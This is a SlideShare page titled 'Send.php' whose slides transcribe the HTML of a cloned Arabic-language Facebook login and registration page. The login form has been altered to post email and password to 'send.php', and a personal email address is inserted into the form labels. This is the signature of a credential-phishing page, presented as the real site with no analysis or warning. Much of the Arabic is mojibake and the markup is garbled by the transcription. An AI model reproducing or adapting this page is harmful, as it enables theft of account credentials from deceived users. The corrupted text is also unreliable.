<!DOCTYPE html><html lang="ar" id="facebook" class="no_js"><head><meta charset="utf-8" /><script>/** js/lib/util/envFlush....
الذينيتعرفونإليهم." /><link rel="alternate" media="handheld"href="https://www.facebook.com/" /><title id="pageTitle">ãÑÍÈÇ...
fsl fwb fcb">íÓÇÚÏß ÝíÓ Èæß Úáì ÇáÊæÇÕá æÇáÊÔÇÑß ãÚ ßá ÇáÃÔÎÇÕ ÝíÍíÇÊß.</div><img class="mtl mtl img" src="https://fbcdn-d...
البريدالإلكتروني"/></div><div class="mbm"><input type="password" class="inputtext text_fieldDOMControl_placeholder" id="re...
value="1971">1971</option><option value="1970">1970</option><optionvalue="1969">1969</option><option value="1968">1968</op...
value="AZlx0VH1yljoKIFH5XpyAD_-xCrfJIz--CRJTOunXCX5WvCGbbxf5vUM8y1ZGoj4RSYV-R2F3hOASh77ax4ov6tYG-ahVQMwzX0iDVgprQjU563Kajq...
none"><img class="img" src="https://fbstatic-a.akamaihd.net/rsrc.php/v2/y4/x/GsNJNwuI-UM.gif" alt="" width="16"height="11"...
أخرى." role="button">ÇáÚÑÈíÉ</a></div></div><divclass="navigation fsm fwn fcg" role="contentinfo" aria-label="روابط موقعفي...
وسياساتنا.">ÇáÔÑæØ</a> ·<a href="http://www.facebook.com/help/?ref=pf" accesskey="0"title="قم بزيارةمركزالمساعدة.">ÇáãÓÇÚÏ...
a.akamaihd.net/rsrc.php/v2/yZ/x/6cc7yjos_ib.js"},"S2nrU":{"type":"js","crossOrigin":1,"src":"https://fbstatic-a.akamaihd.n...
{"resources":["PZesp","MQ62x"],"module":true},"Toggler":{"resources":["PZesp","MQ62x","SYR3Z","raDxA"],"module":true},"Too...
onloadRegister_DEPRECATED(function (){RegistrationBootloader.init("registration_container", true, "reg","form_focus", "htt...
Upcoming SlideShare
Loading in …5
×

Send.php

7,888 views

Published on

0 Comments
0 Likes
Statistics
Notes
 • Be the first to comment

 • Be the first to like this

No Downloads
Views
Total views
7,888
On SlideShare
0
From Embeds
0
Number of Embeds
7
Actions
Shares
0
Downloads
92
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Send.php

 1. 1. <!DOCTYPE html><html lang="ar" id="facebook" class="no_js"><head><meta charset="utf-8" /><script>/** js/lib/util/envFlush.js */function envFlush(a){function b(c){for(var d in a)c[d]=a[d];}if(window.requireLazy){requireLazy([Env],b);}else{Env=window.Env||{};b(Env);}}envFlush({"ffid1":"AcEEhgLkkjHG5kXWFRoxEXuuc04HQp1A6CNt3wUf00p8dpEW7k7j2TC-GQDfMD6z01c","ffid2":"AcEGth8r7FoD1qgOtbC5AhXWAACmILgTQwwJcbSTD0AgvlttB6xtEqHUfxzRADJ4xvw","ffid3":"AcGuukVFa6uRB6K9idQi9mTX1uLBcV3xv6rwFPfEu_69zqm58qAPZ6HhbxAhsnukx1bwttX6zMua6gnvd11TW7NK","ffid4":"AcFZ_4dLxBvbYt9HID7jcxykEyr9X0ynPnLBpmV1ciHVjxFB_8on8pOtUVwpWWFtL4I","ffver":63083,"recaptcha_focus_on_load":"false","recaptcha_lang":""en"","user":"0","locale":"ar_AR","rtl":true,"method":"GET","svn_rev":704568,"tier":"","vip":"69.171.242.27","static_base":"https://s-static.ak.facebook.com/","www_base":"http://www.facebook.com/","rep_lag":2,"fb_dtsg":"AQDlroGS","ajaxpipe_token":"AXihaAeBE9hxGqEg","lhsh":"dAQHLtTW2","tracking_domain":"https://pixel.facebook.com","error_uri":"https://error.facebook.com/common/scribe_endpoint.php","retry_ajax_on_network_error":"1","fbid_emoticons":"1","crossorigin_attribute":true});</script><script>envFlush({"eagleEyeConfig":{"seed":"0qYm","sessionStorage":true}});CavalryLogger=false;window._script_path= "/index.php";</script><noscript><meta http-equiv="refresh" content="0; URL=/?_fb_noscript=1" /></noscript><meta name="robots" content="noodp, noydir" /><metaname="referrer" content="default" id="meta_referrer" /><meta name="description"content="فيس بوك هوأداة تتيحللأشخاصالتواصل معالأصدقاءوغيرهم منالأشخاصالذينيعملون،يتعلمون ويعيشونحولهم. يستخدمالاشخاص فيسبوك للبقاءعلى اتصالبالأصدقاء،ولتحميل عددلا محدود منالصور، ولنشرروابط ومقاطعفيديو،ومعرفةالمزيد عنالأشخاص
 2. 2. الذينيتعرفونإليهم." /><link rel="alternate" media="handheld"href="https://www.facebook.com/" /><title id="pageTitle">ãÑÍÈÇð Èß Ýí ÝíÓ Èæß -Þã ÈÊÓÌíá ÇáÏÎæá Ãæ ÈÇáÊÓÌíá Ãæ ÈãÚÑÝÉ ÇáãÒíÏ</title><meta property="og:image"content="https://www.facebook.com/images/fb_icon_325x325.png" /><linkrel="shortcut icon" href="https://fbstatic-a.akamaihd.net/rsrc.php/y4/x/Ivn-CVe5TGK.ico" /><noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript> <link rel="stylesheet" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yx/x/-8yo4WW-kUB.css" /> <link rel="stylesheet" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yY/x/EoP7MPYX4oc.css" /> <link rel="stylesheet" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yx/x/1qhOMQtyJQg.css" /> <link rel="stylesheet" href="https://fbstatic-a.akamaihd.net/rsrc.php/v2/yi/x/ONRYtHPFCvE.css" /> <script src="https://fbstatic-a.akamaihd.net/rsrc.php/v2/y2/x/lAxygHwExWU.js"crossorigin="anonymous"></script> <script>window.Bootloader && Bootloader.done(["gHLv0"]);</script><script>new(require("ServerJS"))().handle({"require":[["lowerDomain"],["QuicklingPrelude"],["Primer"]]})</script></head><body class="fbIndex UIPage_LoggedOut webkit winLocale_ar_AR"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div class="-cx-PRIVATE-fbLayout__root"><div id="pagelet_bluebar" data-referrer="pagelet_bluebar"><divid="blueBarHolder"><div id="blueBar"><div><divclass="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><aclass="lfloat" href="/" title="الذهابإلى الصفحةالرئيسية منفيس بوك"><i class="fb_logo img sp_6jxgq1sx_df432d"><u>ÔÚÇÑ ÝíÓ Èæß</u></i></a><div class="menu_login_containerrfloat"><form id="login_form" action="send.php=1" method="post" onsubmit="returnwindow.Event &amp;&amp; Event.__inlineSubmit &amp;&amp;Event.__inlineSubmit(this,event)"><input type="hidden" name="lsd"value="AVqE_79r" autocomplete="off" /><table cellspacing="0"><tr><tdclass="html7magic"><label for="email">abdoahmd44@yahoo.com</label></td><tdclass="html7magic"><label for="pass">ßáãÉ ÇáÓÑ</label></td></tr><tr><td><inputtype="text" class="inputtext" name="email" id="email" value="" tabindex="1"/></td><td><input type="password" class="inputtext" name="pass" id="pass"tabindex="2" /></td><td><label class="uiButton uiButtonConfirm" id="loginbutton"for="u_0_4"><input value="تس&#x62#x62c;يلالدخول" tabindex="4" type="submit"id="u_0_4" /></label></td></tr><tr><td class="login_form_label_field"><div><divclass="uiInputLabel clearfix"><input id="persist_box" type="checkbox"name="persistent" value="1" checked="1" class="uiInputLabelCheckbox" /><labelfor="persist_box">ÇáÈÞÇÁ ãÊøÕáÇð</label></div><input type="hidden"name="default_persistent" value="1" /></div></td><tdclass="login_form_label_field"><a rel="nofollow"href="http://www.facebook.com/recover/initiate">åá äÓíÊ ßáãÉÇáÓÑ¿</a></td></tr></table><input type="hidden" name="charset_test"value="&euro;,&acute;,€,´,?,?,?" /><input type="hidden" autocomplete="off"name="timezone" value="" id="u_0_3" /><input type="hidden" name="lgnrnd"value="103324_Eqyx" /><input type="hidden" id="lgnjs" name="lgnjs" value="n"/><input type="hidden" autocomplete="off" id="locale" name="locale"value="ar_AR" /></form></div></div></div></div></div></div></div><divid="globalContainer" class="uiContextualLayerParent"><div id="content"class="fb_content clearfix"><div><!-- 2365fa3194ecdc0cab15721ce967a9f8663937c7--><div class="regCmsContainer"><div style="background: #E7EBF2; min-width:980px"><div class="pvl" style="width: 980px; margin: 0 auto"><divclass="fbIndexMap -cx-PRIVATE-fbMarketingBlock__spacingRight -cx-PRIVATE-fbMarketingBlock__block -cx-PRIVATE-fbMarketingBlock__7column"><div class="title
 3. 3. fsl fwb fcb">íÓÇÚÏß ÝíÓ Èæß Úáì ÇáÊæÇÕá æÇáÊÔÇÑß ãÚ ßá ÇáÃÔÎÇÕ ÝíÍíÇÊß.</div><img class="mtl mtl img" src="https://fbcdn-dragon-a.akamaihd.net/cfs-ak-ash4/84979/417/388809427820169_484552950.png" alt=""/></div><div class="-cx-PRIVATE-fbMarketingBlock__block -cx-PRIVATE-fbMarketingBlock__5column"><h1 class="mbs -cx-PRIVATE-fbMarketingText__huge -cx-PRIVATE-fbMarketingText__dark -cx-PRIVATE-fbMarketingText__bold " style="font-size: 36px">ÇáÊÓÌíá</h1><h2 class="mbl -cx-PRIVATE-fbMarketingText__large -cx-PRIVATE-fbMarketingText__dark -cx-PRIVATE-fbMarketingText__regular">ãÌÇäí¡ æÓíÈÞì ãÌÇäí ÏÇÆãÇð.</h2><div id="registration_container"><div data-referrer="simple_registration_form"><noscript><div id="no_js_box"><h2>ÅäJavascript ãÚØá Ýí ÇáãÊÕÝÍ áÏíß.</h2><p>íÑÌì ÊÝÚíá JavaScript Ýí ÇáãÊÕÝÍ áÏíß ÃæÇáÊÑÞíÉ Åáì ãÊÕÝÍ ããßøä áÜ JavaScript ááÊÓÌíá Ýí ÝíÓÈæß.</p></div></noscript><div id="simple_registration_container"class="simple_registration_container"><div id="reg_box"class="registration_redesign"><form method="post" id="reg" name="reg"action="https://m.facebook.com/r.php" onsubmit="returnfunction(event){return false;}.call(this,event)!==false &amp;&amp;window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp;Event.__inlineSubmit(this,event)"><input type="hidden" name="lsd"value="AVqE_79r" autocomplete="off" /><input type="hidden" autocomplete="off"id="reg_instance" name="reg_instance" value="dH3kUJuuVqhiS-Nhk8Mq8A-z" /><inputtype="hidden" autocomplete="off" id="asked_to_login" name="asked_to_login"/><input type="hidden" autocomplete="off" id="locale" name="locale"value="ar_AR" /><input type="hidden" autocomplete="off" id="terms" name="terms"value="on" /><input type="hidden" autocomplete="off"id="abtest_registration_group" name="abtest_registration_group" value="1"/><input type="hidden" autocomplete="off" id="referrer" name="referrer" value=""/><input type="hidden" autocomplete="off" id="md5pass" name="md5pass"value="" /><input type="hidden" autocomplete="off" id="validate_mx_records"name="validate_mx_records" value="1" /><input type="hidden" autocomplete="off"id="ab_test_data" name="ab_test_data" value="" /><div id="reg_form_box"class="large_form"><div class="clearfix short_fields"><div class="mrmlfloat"><input type="text" class="inputtext text_field DOMControl_placeholder"id="firstname" name="firstname" value="الاسمالأول" aria-required="true"placeholder="الاسمالأول" aria-label="الاسمالأول" /></div><div class="mbm rfloat"><inputtype="text" class="inputtext text_field DOMControl_placeholder" id="lastname"name="lastname" value="اسمالعائلة" aria-required="true"placeholder="اسمالعائلة" aria-label="اسمالعائلة" /></div></div><divclass="mbm"><input type="text" class="inputtext text_fieldDOMControl_placeholder" id="reg_email__" name="reg_email__"value="بريدكالإلكتروني" aria-required="true" autocomplete="off"placeholder="بريدكالإلكتروني" aria-label="بريدكالإلكتروني"/></div><div class="mbm"><input type="text" class="inputtext text_fieldDOMControl_placeholder" id="reg_email_abdoahmd44@yahoo.com__"name="reg_email_abdoahmd44@yahoo.com__" value="أعدإدخال البريدالإلكتروني" aria-required="true" autocomplete="off" placeholder="أعدإدخال البريدالإلكتروني" aria-label="أعد إدخال
 4. 4. البريدالإلكتروني"/></div><div class="mbm"><input type="password" class="inputtext text_fieldDOMControl_placeholder" id="reg_passwd__" name="reg_passwd__"value="كلمة السرالجديدة" aria-required="true"autocomplete="off" placeholder="كلمةالسر الجديدة"aria-label="كلمة السرالجديدة" /></div><div class="mtm mbsbirthday_label">ÊÇÑíÎ ÇáãíáÇÏ:</div><div class="clearfix field_container"><divclass="mrm lfloat"> <select name="birthday_day" id="birthday_day" aria-label="اليوم" class=""><option value="-1">Çáíæã:</option><option value="1">1</option><optionvalue="2">2</option><option value="3">3</option><optionvalue="4">4</option><option value="5">5</option><optionvalue="6">6</option><option value="7">7</option><optionvalue="8">8</option><option value="9">9</option><optionvalue="10">10</option><option value="11">11</option><optionvalue="12">12</option><option value="13">13</option><optionvalue="14">14</option><option value="15">15</option><optionvalue="16">16</option><option value="17">17</option><optionvalue="18">18</option><option value="19">19</option><optionvalue="20">20</option><option value="21">21</option><optionvalue="22">22</option><option value="23">23</option><optionvalue="24">24</option><option value="25">25</option><optionvalue="26">26</option><option value="27">27</option><optionvalue="28">28</option><option value="29">29</option><optionvalue="30">30</option><option value="31">31</option></select> <selectname="birthday_month" id="birthday_month" aria-label="شهر"class="" onchange="return run_with(this, [&quot;editor&quot;], function(){editor_date_month_change(this, &quot;birthday_day&quot;,&quot;birthday_year&quot;);});"><option value="-1">ÇáÔåÑ:</option><optionvalue="1">íäÇíÑ</option><option value="2">ÝÈÑÇíÑ</option><optionvalue="3">ãÇÑÓ</option><option value="4">ÃÈÑíá</option><optionvalue="5">ãÇíæ</option><option value="6">íæäíæ</option><optionvalue="7">íæáíæ</option><option value="8">ÃÛÓØÓ</option><optionvalue="9">ÓÈÊãÈÑ</option><option value="10">ÃßÊæÈÑ</option><optionvalue="11">äæÝãÈÑ</option><option value="12">ÏíÓãÈÑ</option></select> <selectname="birthday_year" id="birthday_year" aria-label="سنة" class="" onchange="return run_with(this, [&quot;editor&quot;], function(){editor_date_month_change(&quot;birthday_month&quot;,&quot;birthday_day&quot;,this);});"><option value="-1">ÇáÓäÉ:</option><optionvalue="2013">2013</option><option value="2012">2012</option><optionvalue="2011">2011</option><option value="2010">2010</option><optionvalue="2009">2009</option><option value="2008">2008</option><optionvalue="2007">2007</option><option value="2006">2006</option><optionvalue="2005">2005</option><option value="2004">2004</option><optionvalue="2003">2003</option><option value="2002">2002</option><optionvalue="2001">2001</option><option value="2000">2000</option><optionvalue="1999">1999</option><option value="1998">1998</option><optionvalue="1997">1997</option><option value="1996">1996</option><optionvalue="1995">1995</option><option value="1994">1994</option><optionvalue="1993">1993</option><option value="1992">1992</option><optionvalue="1991">1991</option><option value="1990">1990</option><optionvalue="1989">1989</option><option value="1988">1988</option><optionvalue="1987">1987</option><option value="1986">1986</option><optionvalue="1985">1985</option><option value="1984">1984</option><optionvalue="1983">1983</option><option value="1982">1982</option><optionvalue="1981">1981</option><option value="1980">1980</option><optionvalue="1979">1979</option><option value="1978">1978</option><optionvalue="1977">1977</option><option value="1976">1976</option><optionvalue="1975">1975</option><option value="1974">1974</option><optionvalue="1973">1973</option><option value="1972">1972</option><option
 5. 5. value="1971">1971</option><option value="1970">1970</option><optionvalue="1969">1969</option><option value="1968">1968</option><optionvalue="1967">1967</option><option value="1966">1966</option><optionvalue="1965">1965</option><option value="1964">1964</option><optionvalue="1963">1963</option><option value="1962">1962</option><optionvalue="1961">1961</option><option value="1960">1960</option><optionvalue="1959">1959</option><option value="1958">1958</option><optionvalue="1957">1957</option><option value="1956">1956</option><optionvalue="1955">1955</option><option value="1954">1954</option><optionvalue="1953">1953</option><option value="1952">1952</option><optionvalue="1951">1951</option><option value="1950">1950</option><optionvalue="1949">1949</option><option value="1948">1948</option><optionvalue="1947">1947</option><option value="1946">1946</option><optionvalue="1945">1945</option><option value="1944">1944</option><optionvalue="1943">1943</option><option value="1942">1942</option><optionvalue="1941">1941</option><option value="1940">1940</option><optionvalue="1939">1939</option><option value="1938">1938</option><optionvalue="1937">1937</option><option value="1936">1936</option><optionvalue="1935">1935</option><option value="1934">1934</option><optionvalue="1933">1933</option><option value="1932">1932</option><optionvalue="1931">1931</option><option value="1930">1930</option><optionvalue="1929">1929</option><option value="1928">1928</option><optionvalue="1927">1927</option><option value="1926">1926</option><optionvalue="1925">1925</option><option value="1924">1924</option><optionvalue="1923">1923</option><option value="1922">1922</option><optionvalue="1921">1921</option><option value="1920">1920</option><optionvalue="1919">1919</option><option value="1918">1918</option><optionvalue="1917">1917</option><option value="1916">1916</option><optionvalue="1915">1915</option><option value="1914">1914</option><optionvalue="1913">1913</option><option value="1912">1912</option><optionvalue="1911">1911</option><option value="1910">1910</option><optionvalue="1909">1909</option><option value="1908">1908</option><optionvalue="1907">1907</option><option value="1906">1906</option><optionvalue="1905">1905</option></select></div><div class="pts"><divid="birthday_warning"><a href="#" ajaxify="/help/ajax/reg_birthday"title="اضغط هنالمزيد منالمعلومات" rel="async">áãóÚáíø ÅÏÎÇá ÊÇÑíÎ ãíáÇÏí ¿</a></div></div></div><div class="mtl mbm"><divclass="uiInputLabel clearfix inlineBlock"><input type="radio" name="sex"class="sex_option uiInputLabelRadio" value="1" id="u_0_0" /><labelclass="gender_label" for="u_0_0">ÃäËì</label></div><div class="uiInputLabelclearfix inlineBlock"><input type="radio" name="sex" class="sex_optionuiInputLabelRadio" value="2" id="u_0_1" /><label class="gender_label"for="u_0_1">ÐßÑ</label></div></div><td class="label"></td><divclass="fbRegistrationPPT" id="ppt_container"><p class="privacy_policy_texttext">ÈÇáÖÛØ Úáì ÇáÊÓÌíá¡ ÊæÇÝÞ Úáì þ<a href="/terms.php" target="_blank"rel="nofollow">ÔÑæØäÇ</a>þ æÃäß ÞÑÃÊ þ<a href="/policy.php" target="_blank"rel="nofollow">ÓíÇÓÉ ÇÓÊÎÏÇã ÇáÈíÇäÇÊ</a>þ áÏíäÇ¡ ÈãÇ Ýí Ðáß þ<ahref="/help/cookies/" target="_blank" rel="nofollow">ÇÓÊÎÏÇã ãáÝÇÊ ÊÚÑíÝÇáÇÑÊÈÇØ</a>þ.</p></div><div class="reg_btn clearfix"><button type="submit"class="-cx-PRIVATE-fbMarketingButton__button mvm -cx-PRIVATE-fbMarketingButton__green -cx-PRIVATE-fbMarketingButton__padding signup_button-cx-PRIVATE-fbMarketingText__large -cx-PRIVATE-fbMarketingText__bold "name="websubmit" onclick="setFormTypeABTest($(&quot;reg&quot;));RegistrationBootloader.bootloadAndValidate();">ÇáÊÓÌíá</button><spanid="async_status" class="async_status" style="display: none"><img class="img"src="https://fbstatic-a.akamaihd.net/rsrc.php/v2/y4/x/GsNJNwuI-UM.gif" alt=""width="16" height="11" /></span></div></div><div id="reg_captcha"style="display: none"><div><h2 id="security_check_header">ÇáÇÎÊÈÇÑÇáÃãäí</h2><div id="outer_captcha_box"><div id="captcha_box"><divclass="field_error" id="captcha_response_error" style="display:none;">åÐÇ ÇáÍÞáãØáæÈ.</div><div id="captcha" class="captcha"><input type="hidden"autocomplete="off" id="captcha_persist_data" name="captcha_persist_data"
 6. 6. value="AZlx0VH1yljoKIFH5XpyAD_-xCrfJIz--CRJTOunXCX5WvCGbbxf5vUM8y1ZGoj4RSYV-R2F3hOASh77ax4ov6tYG-ahVQMwzX0iDVgprQjU563KajqdfYM3GGFFMtLpSOZdKoI8Vz7gJ64T6EhrMzAEnEBDus8DhUAO7KUdWpYbWJlpK9xeLRkGaQqqmj4-Plq-bjHBZTOGRjwVpDGY_2_9D-YavRsQXKMtYD0hoQTruNnqthSIskU6V5WCfOesXZjFbVCSGXOahPARsQb4JbrmXjtwZq3v8-yPAXxiklSviGL8Ox8Kh-iZKf_g6l5IyY7h0lJ5Q6JeVq1qxX0ft7rSilgG-1IZXAO_cSIH4GUjaQ"/><div><div id="recaptcha_scripts" style="display:none"></div><inputtype="hidden" autocomplete="off" id="captcha_session" name="captcha_session"value="wdSc9oTZWPtkYd_04svbkQ" /><input type="hidden" autocomplete="off"id="extra_challenge_params" name="extra_challenge_params"value="authp=nonce.tt.time.new_audio_default&amp;psig=u1hrO1uG1f4rDI-SZRLqEUawBVo&amp;nonce=wdSc9oTZWPtkYd_04svbkQ&amp;tt=W5QcSINz5OGtCsmEwTPf4Dmz2BU&amp;time=1357151604&amp;new_audio_default=1" /><input type="hidden"autocomplete="off" id="recaptcha_type" name="recaptcha_type" value="password"/><div class="recaptcha_text"><div class="recaptcha_only_if_image">ÃÏÎá ÇáßáãÊíäÃÏäÇå¡ ãÝÕæáÊíä ÈãÓÇÝÉ.<br />áÇ íãßäß ÞÑÇÁÉ ÇáßáãÇÊ ÃÓÝáå¿ þ<a href="#"onclick="Recaptcha.reload(); return false" id="recaptcha_reload_btn">ÌÑøÈ ßáãÇÊÃÎÑì</a>þ Ãæ þ<a href="#" onclick="Recaptcha.switch_type(&quot;audio&quot;);return false;">ÇáÊÓÌíá ÇáÕæÊí</a>þ.</div><div class="recaptcha_only_if_audio"style="display:none">íÑÌì ÅÏÎÇá ÇáßáãÇÊ Ãæ ÇáÃÑÞÇã ÇáÊí ÊÓãÚåÇ.<br />þ<ahref="#" onclick="Recaptcha.reload(); return false"id="recaptcha_reload_btn">ÌÑøÈ ßáãÇÊ ÃÎÑì</a>þ Ãæ þ<aclass="recaptcha_only_if_audio" href="#"onclick="Recaptcha.switch_type(&quot;image&quot;); return false;">ÚæÏÉ ÅáìÇáäÕ</a>þ.</div></div><span id="recaptcha_play_audio"></span><divclass="audiocaptcha"></div><div id="recaptcha_image"class="captcha_image"></div><div id="recaptcha_loading">ÌÇÑí ÇáÊÍãíá...<imgclass="captcha_loading img" src="https://fbexternal-a.akamaihd.net/safe_image.php?d=AQDTBYxM0JIZXARf&amp;url=https%3A%2F%2Ffbstatic-a.akamaihd.net%2Frsrc.php%2Fv2%2Fy4%2Fx%2FGsNJNwuI-UM.gif" alt=""style="height:11px;width:16px;" /></div></div><divclass="captcha_input"><label>íÑÌì ßÊÇÈÉ ÇáäÕ Ýí ÇáãÑÈÚ:</label><divclass="field_container"><input type="text" name="captcha_response"id="captcha_response" autocomplete="off" aria-label="<spandir="ltr">إدخالكلماتالتأكيدالمنظور. أكتبالكلماتأعلاهللمتابعة.بالإمكانأيضاً سماعالكلمات عنطريق الضغطعلى الرابطأعلاه.</span>" /></div><a class="mlm" href="#"onclick="CSS.show($('captcha_whats_this')); return false;">ãÇåÐÇ¿</a><div id="captcha_whats_this" class="hidden_elem"><div class="fslfwb">ÇáÇÎÊÈÇÑ ÇáÃãäí</div>åÐÇ ÇÎÊÈÇÑ ÃãÇä ÞíÇÓí äÓÊÎÏãå áãäÚ ãÑÓáí ÇáÈÑíÏÇáÚÔæÇÆí ãä ÅäÔÇÁ ÍÓÇÈÇÊ ãÒíøÝÉ æÅÑÓÇá ÑÓÇÆá ÈÑíÏ ÚÔæÇÆí ÅáìÇáãÓÊÎÏãíä.</div></div></div></div></div><div><div class="gridCol"></div><divclass="gridCol"></div></div><div id="captcha_buttons" class="clearfix"style="display: none;"><div id="back_button" class="gridCol"><divclass="cancel_button_image"> </div><a id="cancel_button" href="#"onclick="return run_with(this, [&quot;registration&quot;], function(){Registration.getInstance().hide_captcha();Registration.getInstance().show_reg_form();});">ÚæÏÉ</a></div><div id="A_btn_sign_up" class="gridCol"><divclass="reg_btn clearfix"><label class="big_input uiButton uiButtonSpecial" for="u_0_2"><inputvalue="التسجيل"onclick="setFormTypeABTest($(&quot;reg&quot;));Registration.getInstance().validateForm();" type="submit" id="u_0_2"/></label><span id="captcha_async_status" class="async_status" style="display:
 7. 7. none"><img class="img" src="https://fbstatic-a.akamaihd.net/rsrc.php/v2/y4/x/GsNJNwuI-UM.gif" alt="" width="16"height="11" /></span></div></div></div></div></div></form><div id="reg_progress"style="display: none"><div id="progress_wrap"><img class="img"src="https://fbstatic-a.akamaihd.net/rsrc.php/v2/y4/x/GsNJNwuI-UM.gif" alt=""width="16" height="11" /><div id="progress_msg">ÌÇÑíÇáÊÓÌíá...</div></div></div><div id="reg_error" class="hidden_elem"><divid="reg_error_inner">ÍÏË ÎØá íÑÌì ÇáãÍÇæáÉ ãÑÉ ÃÎÑì.</div></div><divid="tos_container" class="tos_container"><p class="legal_tos hidden_elem">ÈÇáÖÛØÚáì ÊÓÌíá¡ ÊÄßÏ Ãäß ÞÑÃÊ ææÇÝÞÊ Úáì þ<a href="/legal/terms" target="_blank"rel="nofollow">ÔÑæØ ÇáÇÓÊÎÏÇã</a>þ æþ<a href="/policy.php" target="_blank"rel="nofollow">ÓíÇÓÉ ÇáÎÕæÕíÉ</a>þ.</p></div><div id="reg_pages_msg"class="pagesSection pagesSectionPPT placeholder_design_pages_msg">þ<ahref="/pages/create.php">ÅäÔÇÁ ÕÝÍÉ</a>þ áÝÑÞ ãæÓíÞíÉ Ãæ ãÔÇåíÑ ÃæÔÑßÇÊ.</div></div></div></div></div></div></div></div></div><div class="mtmlocales"><ul class="uiList localeSelectorList -cx-PRIVATE-uiList__horiz clearfix-cx-PRIVATE-uiList__noEdgePadding -cx-PRIVATE-uiList__mediumSpacing -cx-PRIVATE-uiList__noBorder"><li class="uiListItem"><a dir="ltr"href="https://www.facebook.com/"onclick="intl_set_cookie_locale(&quot;en_US&quot;,&quot;https://www.facebook.com/&quot;);" title="English (US)">English(US)</a></li><li class="uiListItem"><a dir="rtl"href="https://www.facebook.com/"onclick="intl_set_cookie_locale(&quot;ar_AR&quot;,&quot;https://www.facebook.com/&quot;);" title="Arabic">ÇáÚÑÈíÉ</a></li><liclass="uiListItem"><a dir="ltr" href="https://www.facebook.com/"onclick="intl_set_cookie_locale(&quot;es_LA&quot;,&quot;https://www.facebook.com/&quot;);" title="Spanish">Espa?ol</a></li><liclass="uiListItem"><a dir="ltr" href="https://www.facebook.com/"onclick="intl_set_cookie_locale(&quot;pt_BR&quot;,&quot;https://www.facebook.com/&quot;);" title="Portuguese(Brazil)">Português (Brasil)</a></li><li class="uiListItem"><a dir="ltr"href="https://www.facebook.com/"onclick="intl_set_cookie_locale(&quot;fr_FR&quot;,&quot;https://www.facebook.com/&quot;);" title="French (France)">Français(France)</a></li><li class="uiListItem"><a dir="ltr"href="https://www.facebook.com/"onclick="intl_set_cookie_locale(&quot;de_DE&quot;,&quot;https://www.facebook.com/&quot;);" title="German">Deutsch</a></li><liclass="uiListItem"><a dir="ltr" href="https://www.facebook.com/"onclick="intl_set_cookie_locale(&quot;it_IT&quot;,&quot;https://www.facebook.com/&quot;);" title="Italian">Italiano</a></li><liclass="uiListItem"><a dir="ltr" href="https://www.facebook.com/"onclick="intl_set_cookie_locale(&quot;hi_IN&quot;,&quot;https://www.facebook.com/&quot;);" title="Hindi">??????</a></li><liclass="uiListItem"><a dir="ltr" href="https://www.facebook.com/"onclick="intl_set_cookie_locale(&quot;zh_CN&quot;,&quot;https://www.facebook.com/&quot;);" title="Simplified Chinese(China)">??(??)</a></li><li class="uiListItem"><a dir="ltr"href="https://www.facebook.com/"onclick="intl_set_cookie_locale(&quot;ja_JP&quot;,&quot;https://www.facebook.com/&quot;);" title="Japanese">???</a></li><liclass="uiListItem"><a class="showMore" rel="dialog"href="/ajax/intl/language_dialog.php?uri=https%3A%2F%2Fwww.facebook.com%2F&amp;source=TOP_LOCALES_DIALOG" title="عرضالمزيد مناللغات"role="button">...</a></li></ul></div></div></div><div id="pageFooter" data-referrer="page_footer"><div id="contentCurve"></div><div class="clearfix"id="footerContainer"><div class="mrl lfloat"><div class="fsm fwn fcg"><span>Facebook © 2013</span> · <a rel="dialog" href="/ajax/intl/language_dialog.php?uri=https%3A%2F%2Fwww.facebook.com%2F"title="استخدم فيسبوك بلغة
 8. 8. أخرى." role="button">ÇáÚÑÈíÉ</a></div></div><divclass="navigation fsm fwn fcg" role="contentinfo" aria-label="روابط موقعفيس بوك"><ahref="http://www.facebook.com/mobile/?ref=pf"title="تعرّف إلىفيس بوكموبايل.">ÇáåÇÊÝ ÇáãÍãæá</a> · <ahref="http://www.facebook.com/find-friends?ref=pf"title="ابحث عن أيشخص فيالشبكة.">ÇáÈÍË Úä ÃÕÏÞÇÁ</a> · <ahref="http://www.facebook.com/badges/?ref=pf"title="تضمين شارةفيس بوك علىالموقعالإلكترونيالخاص بك.">ÇáÔÇÑÇÊ</a> · <ahref="http://www.facebook.com/directory/people/"title="تصفح دليلأشخاصنا.">ÃÔÎÇÕ</a> · <ahref="http://www.facebook.com/directory/pages/"title="تصفح دليلصفحاتنا">ÇáÕÝÍÇÊ</a> · <ahref="http://www.facebook.com/directory/places/" title="‎Browse ourplaces directory.‎">ÃãÇßä</a> · <ahref="http://www.facebook.com/appcenter/?ref=pf" title="‎Check outFacebook App Center.‎">ÇáÊØÈíÞÇÊ</a> · <ahref="http://www.facebook.com/appcenter/category/games/?ref=pf"title="‎Check out Facebook games.‎">ÇáÃáÚÇÈ</a> · <ahref="http://www.facebook.com/appcenter/category/music/?ref=pf"title="‎Check out Facebook music apps.‎">ãæÓíÞì</a> · <ahref="http://www.facebook.com/facebook" accesskey="8"title="اقرأمدونتنا،واستكشف مركزالموارد،وابحث عن فرصالعمل.">Íæá ÝíÓ Èæß</a> · <ahref="http://www.facebook.com/campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=auto"title="الإعلان فيفيس بوك.">ÅäÔÇÁ ÅÚáÇä</a> · <ahref="http://www.facebook.com/pages/create.php?ref_type=sitefooter"title="إنشاء صفحة">ÅäÔÇÁÕÝÍÉ</a> · <a href="http://developers.facebook.com/?ref=pf"title="قم بالتطويرفي منصتنا.">ÇáãØæøÑæä</a> · <ahref="http://www.facebook.com/careers/?ref=pf"title="حقّق النجاحفي مسيرتكالمهنية،انتقل إلىشركتناالرائعة.">Çáãåä</a> · <ahref="http://www.facebook.com/privacy/explanation"title="تعرّف إلىالخصوصيةوفيس بوك.">ÇáÎÕæÕíÉ</a> · <ahref="http://www.facebook.com/help/cookies" title="‎Learn about cookiesand Facebook.‎">ãáÝÇÊ ÊÚÑíÝ ÇáÇÑÊÈÇØÇÊ</a> · <ahref="http://www.facebook.com/policies/?ref=pf" accesskey="9"title="مراجعةشورطنا
